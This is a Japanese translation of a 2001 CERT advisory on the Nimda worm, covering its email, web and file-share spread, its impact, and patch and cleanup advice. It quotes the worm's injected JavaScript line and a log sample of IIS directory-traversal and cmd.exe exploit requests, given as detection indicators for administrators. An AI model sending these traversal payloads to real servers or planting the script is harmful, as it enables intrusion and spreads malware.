CERT/CC

Advisories

Tech Tips

Incident Notes

Summaries


和訳版

最近版

全CERT勧告

Tech Tips

CERT Advisory 2001-26

  • この文書はCERT Advisory文書の和訳である。和訳については一切の 保証はしない。この文書を使った結果のあらゆる損害等について 訳者は一切責を負わない。また、転載は禁じる。
  • この和訳は文書の性質上、in rushであり、訳の自然さより も訳出の迅速さを目指している。内容の正確さについては訳者としての 良心から可能な限り気をつけているが、通常の翻訳であれば訳の改善を 図るために訳語等で悩む時間を極力圧縮しているため、不自然なところが 残っているかもしれない。指摘は歓迎である。なお、読者対象は文書の 性質上、ネットワーク管理者等であるため、この読者層に通じやすい 訳語選定を心がけている。
  • この和訳はあくまでも訳者の個人的な関心に基づいて行われている。 今後、飽きるまでは原則として24時間以内の翻訳を目指す(この迅速さが どこまでできるかが訳者の関心である)が、予告なく遅延、終了すること がある。
  • 本文書の和訳について、CERTから翻訳許諾は受けていない。別所で CERTと契約を行って翻訳を行っているところがある。 なお、本翻訳はその翻訳を 一切参照していない。特にその必要を感じないからでもあるが、本質的に 翻訳は訳者の解釈の塊であり、複数の独立した翻訳があることで、注意 深い読者が比較検討して、読者の判断で何が正しいのかを判断できると 考えるためである。
  • この翻訳に対して、しかるべきところから明示的に翻訳拒絶の連絡を 受けた場合を除き、本翻訳は訳者の責任において公開する。ただし、内容 についての責任は最初に書いたように負わない。
  • 訳者は大阪女子大学情報センター講師の橋本喜代太(hash@reasoning.org, hash@center.osaka-wu.ac.jp) である。ただし、本文書の訳出に当たって、大学当局は何ら関係ない。
  • 関連文書は ここにリストがある。

CERT® Advisory CA-2001-26 Nimda Worm

Original release date: September 18, 2001
Revised: September 19, 2001
Source: CERT/CC

本文書の完全な履歴は文書末尾にある。

影響を受けるシステム

  • Microsoft Windows 95, 98, ME, NT, 2000のいずれかを動作させているシステム

概要

CERT/CCは"W32/Nimda worm"または"Concept Virus (V) v.5"と呼ばれる新たな 悪意あるコードについての報告を受け取っている。この新しいワームは複数の メカニズムを利用して伝播するようである。

初期段階における分析では、このワームは自身の伝播を容易にすることを 目的としたウェブコンテンツの改竄を超える破壊的な行為は行なっていない。

ただし、広範なネットワークのスキャンと電子メールによる伝播の結果 サービス妨害(DoS)状態になったとの報告も受けている。

I. 記述

NimdaワームはWindows 95, 98, Me, NT, 2000を利用している、 ユーザが利用するパソコン(クライアント)と、Windows NTまたは2000を動作させている サーバのいずれにも感染する。

電子メールによる伝播

このワームの伝播は、2つのセクションからなるMIME "multipart/alternative" メッセージとして到着する電子メールを介して行なわれる。1つめのセクションは MIME Type "text/html"と定義されているが、実際にはテキストは存在しない。 つまり、この電子メールは一見、空メールに見える。2つめのセクションはMIME Type "audio/x-wav"と定義されているが、実際にはBase64形式でエンコードされた "readme.exe"という添付ファイルであり、これは実行可能なバイナリファイル である。

CA-2001-06 (埋め込まれたMIME Typeの自動実行)で記述された脆弱性が原因となり、 HTMLメールを表示するのにMicrosoft Internet Explorer 5.5 SP1またはそれ以前(ただしIE 5.01 SP2は 除く)を利用しているx86プラットフォーム上で動作するメールソフトウェアは いかなるものであれ、添付されたファイルを自動的に実行する。この結果、 マシンはこのワームに感染する。こうして、脆弱な設定状況においては、このメール メッセージを単に開く(またはプレビューする)だけで自動的にこのワームに感染する ことになる。実行可能なバイナリファイルであるから、添付ファイルを実行する だけでも感染する。

このNimdaワームを広める電子メールには次のような特徴もある。

  • サブジェクト行のテキストはさまざまであるようだが、これまでに見られる ものは80文字以上のものであった。

  • 添付されたバイナリファイルは少しずつ異なる変異版が多く存在するよう である。このため、別々の電子メールメッセージで送られてきた異なる添付ファイル を比較すると、MD5チェックサムは異なる。しかし、添付されたファイルの大きさは どれも同じで57344バイトである。

ペイロード

感染したクライアントマシンはWindowsのアドレス帳に登録されたすべての アドレスに電子メールを介してNimdaワームのコピーを送ろうと試みる。

また、クライアントマシンは脆弱なIISサーバを探すスキャニングを開始する。 Nimdaが探すのはCode Red II [IN-2001-09; その和訳]並びに sadmind/IIS worm [CA-2001-11; その和訳]という 既に明らかになっているIISワームが仕掛けるバックドアである。 また、IISディレクトリトラバースの脆弱性(VU #111677)に付け入ることも試みる。ターゲットとするIPアドレスの選択はおおむね 次のような確率によっている。

  • 50%はIPアドレスの最初の2オクテットが同じアドレスが選ばれる
  • 25%はIPアドレスの最初の1オクテットが同じアドレスが選ばれる
  • 残り25%はまったくランダムなアドレスが選ばれる
感染したクライアントマシンはNimdaコードのコピーを、スキャンして脆弱である ことが判明したあらゆるサーバに転送する。このワームがサーバマシン上で実行 されると、システム上の各ディレクトリ(その中にはファイル共有を通じてアクセス できるものも含まれる)をトラバースし、README.EMLというファイル名で自身のコピー を書き込む。ウェブコンテンツ(HTMLまたはASPファイル)を保存しているディレクトリが 見つかった場合、次のようなJavascriptコードがウェブ関連のファイルすべてに 追加される。 
<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>
このウェブコンテンツの改竄によって、ブラウザないし、ネットワークファイルシステムの閲覧 を通じて、このワームはさらに新たなクライアントへと伝播することになる。

ブラウザによる伝播

感染過程において、Nimdaワームは、見つけたウェブコンテンツファイル(.html, .html, .aspの拡張子を持つファイルを含むが、それらに限定されるわけではない) すべてを改竄する。その結果、そのシステム上にあるウェブコンテンツを閲覧するユーザ は、それがネットワーク共有などのファイルシステム経由であろうと、ウェブサーバ 経由であろうと、このワームのコピーをダウンロードしてしまうことになる。 ブラウザによっては、このダウンロードしたコピーを自動的に実行してしまい、 閲覧している側のシステムも感染することになる。

ファイルシステム経由での伝播

Nimdaワームは、ユーザがアクセス権を持つすべての書き込み可能なディレクトリ (ネットワーク共有されたものも含む)に(README.EMLというファイル名で)自身のコピーを大量に作成する。 ユーザがプレビューオプションを有効にしたWindows Explorerで、 ネットワーク共有した他のマシン上のドライブにあるこのワームのファイルを 選択すると、自動的にユーザのマシンも攻略されてしまう。

システムに残される攻撃足跡

Nimdaワームがスキャニングを行なった場合、ポート80/tcpを待ち受けている あらゆるウェブサーバのログファイルに次のようなログが残される。 
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
注: このサンプルログの最初の4行はCode Red IIが仕掛けたバックドアに接続しようと していることを示しており、その後の行はディレクトリトラバースの脆弱性に付け入ろう としていることを示している。

II. 影響

侵入者は、パッチ適用前のバージョンのIISを動作させているシステムに おいて、ローカルシステムのセキュリティコンテキスト内で任意のコマンド を実行できる[訳者追補: ほとんどの場合、IISはSystem権限で動作している ため、これはシステム/管理者特権のレベルで任意のコマンドを実行できる ということである]。また、攻略されたホストは他のインターネットサイトを攻撃する 側に回ってしまう危険性もきわめて高い。

Nimdaワームのスキャンは高頻度で行なわれるため、感染したマシンの あるネットワークにおいては帯域が食いつぶされ、サービス拒否状態 に陥ることもある。[訳者追補]実際、2001年9月17日現在、インターネット 全体で深刻なパフォーマンス低下が観察されている。

III. 解決策

IISを動作させているマシンのシステム管理者に推奨される対策

システムが攻略されたかどうかを判断するには、次の諸点を確認 されたい。

  • root.exeがあるかどうか (存在した場合、Nimdaワームに対して システムが脆弱な原因を作ったCode Red IIまたはsadmind/IISワームに 攻略されたことを示している) [訳者追補] 詳しくは関連文書を 参照されたいが、root.exeはc:\inetpub\scripts\に置かれている。 また、c:\explorer.exeが存在した場合もCode Red IIに感染している。
  • ウェブコンテンツを保存しているディレクトリにadmin.dllや見知らぬ.emlファイル が存在するかどうか (存在した場合、Nimdaワームに既に攻略された ということである)

システムが攻略されてしまった場合、安全確実な復旧方法はただ一つで、 システムドライブをフォーマットし直し、ベンダ提供のCD-ROMなど信頼できる メディアを使ってシステムソフトウェアを再インストールするというものである。 また、ソフトウェアを再インストールした後、ベンダが提供するセキュリティ関係 の修正パッチをすべて適用する必要がある。こうした作業を行なう際、ネットワーク には接続すべきでない。しかし、サーバとしてのネットワークサービスを すべて停止するなど十分な注意を払うならば、インターネットを介して 修正パッチをダウンロードするのも可能である。

[訳者追補] 実際には手元に過去の修正パッチを保管していないケースが 大半であろう。この場合、少なくとも、IIS, DNS, telnetd, ftpdの4つのサービス は必ず停止すること。この停止の際にただ停止するだけでなく、起動設定が [自動]になっている場合は[手動]に変更すること。そうしなければ修正パッチを 適用するたびに要求される再起動のたびに再びサービスが自動起動されてしまう。 また、もし本和訳を閲覧しているシステムサポート部等の部署の人がいれば、自分 の顧客向けにサービスパック、各種修正パッチをまとめたCD-Rを作成するなどの 用意をして顧客に配布するといったことも検討していただきたい。残念ながら システム管理者のレベルでも必要な修正パッチがどれか、また、最新版がどれか が理解困難になっているケースはきわめて多いのが実情である。

システムを復旧させる詳細な手順についてはCERT/CCが発行するtech tip文書がある。

Steps for Recovering from a UNIX or NT System Compromise

ベンダが提供する適切な修正パッチを適用せよ

Nimdaワームが付け入ろうとするIIS関連のすべての脆弱性を修正する パッチ集がMicrosoftから入手できる。

http://www.microsoft.com/technet/security/bulletin/MS01-044.asp

エンドユーザのシステムに対して推奨される対策

ベンダが提供する適切な修正パッチを適用せよ

利用しているInternet Explorer (IE)が脆弱なバージョンのものであれば、 CERT/CCはMicrosoftが以下で公開している「埋め込まれたMIME Typeの自動実行」 についての脆弱性に対する修正パッチを適用することを推奨する。

http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

注: 上記のパッチに置き換わるものとして、MS01-027で記述されたIE 5.01並びに5.5の修正パッチ が既に公開されている。

ウィルス対策製品を使い、最新状態に保て

すべてのユーザがウィルス対策用ソフトウェアをインストールし、 常にシステムを監視させるべきである。そして(訳注:この斜字体の 部分は訳者が追補した)、ウィルス対策用ソフトウェアを最新状態に 更新するのが重要である。たいていのウィルス対策製品のベンダは この悪意あるコードを検知し、部分的に復旧を図る手助けとなるような 情報、ツール、ウィルス定義ファイルの最新版を既に公開している。 各ベンダのウィルス対策製品情報についてはAppendix A にリンクを掲載している。

ウィルス対策用ソフトウェアにはたいていウィルス定義ファイルの自動更新機能 がある。利用できる場合は、この自動更新機能を利用することを我々は推奨する。

[訳者追補] ただし、自動更新機能は必ずしも万能ではない。エンジンや ウィルス定義ファイルを更新した際にシステムの再起動を求める製品が多いが、 システムを24時間稼動させるような使い方をしている場合、(1) 再起動するまで 更新されたものは有効になっていないことがあったり、(2) 再起動するまで次の 更新は行なわれないことがあったりする。これは同一の製品においても環境に よって異なる場合があるようだが、訳者としては、製品が要求するかどうかを 問わず、ウィルス対策製品に関する更新を行なった場合、システムを再起動する ことを推奨する。

電子メールに添付されたファイルを開けてはいけない

Nimdaワームは"readme.exe"というファイルが点された電子メールとして 届く。ユーザはこの添付ファイルを開いてはいけない

JavaScriptを無効にせよ

エンドユーザのシステムは、感染したサーバが提供するウェブサイトを 閲覧することによってNimdaワームに感染することがある。この感染方法は JavaScriptの利用が有効になっていなければ行なわれない。このため、 CERT/CCはエンドユーザシステムではJavaScriptの使用を無効にする設定に することを推奨する。

Appendix A. ベンダ情報

ウィルス対策ソフトのベンダ情報

Central Command, Inc.

http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?p_refno=010918-000005

Command Software Systems

http://www.commandsoftware.com/virus/nimda.html

Data Fellows Corp

http://www.datafellows.com/v-descs/nimda.shtml

McAfee

http://vil.mcafee.com/dispVirus.asp?virus_k=99209&

Sophos

http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

Symantec

http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

Trend Micro

http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A

参照文献

CERT/CCはコンピュータウィルスリソースページを公開している。

http://www.cert.org/other_sources/viruses.html
著者:  Roman Danyliw, Chad Dougherty, Allen Householder, Robin Ruefle
本文書の原文は次で入手できる。
http://www.cert.org/advisories/CA-2001-26.html

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
Conditions for use, disclaimers, and sponsorship information

Copyright 2001 Carnegie Mellon University.

更新履歴 

September 18, 2001: Initial Release
September 19, 2001: Updated link to MS advisory MS01-027
この翻訳は橋本喜代太(hash@reasoning.org)が行った。 翻訳公開は原文を受け取ってから(訳者の使用しているPOPサーバに メールが届いた時点であり、訳者自身がメールを見た時点ではない) 約3時間後である。ただし、記載されるワームの影響のため、現時点で 世界中のネットワークは高負荷状態に置かれており、CERTからの配信 そのものが数時間かかったようである。

本和訳の改訂履歴
2001年9月19日午後6時20分 (JST) 初版公開

訳者並びに連絡先: 橋本喜代太